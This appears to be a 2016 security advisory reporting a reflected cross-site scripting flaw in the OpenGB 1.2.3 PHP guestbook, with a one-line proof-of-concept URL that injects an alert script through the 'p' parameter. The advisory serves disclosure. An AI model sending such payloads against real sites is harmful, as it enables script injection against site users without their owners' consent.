OpenGB 1.2.3 Cross Site Scripting

2016.11.09

Credit: N_A

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

OpenGB version 1.2.3 Cross Site Scripting (XSS) Vulnerability
=================================================================

Discovered by N_A, N_A[at]tutanota.com
======================================

Description
============

A simple PHP MySQL website guestbook, user friendly and easily configurable. Features include administrator control panel, spam protection and IP address blocking. Please see http://opengb.googlecode.com for more information from the official website.

https://sourceforge.net/projects/opengb

Vulnerability
==============

OpenGB version <= 1.2.3 suffers from an XSS vulnerabilty from GET paramter 'p'. 
The input is not sanitized and it is possible to execute an XSS attack.

Proof Of Concept 
=================

http://127.0.0.1/gb/index.php?n=1&p=%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E

Email
======

N_A[at]tutanota.com

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

OpenGB 1.2.3 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

OpenGB 1.2.3 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.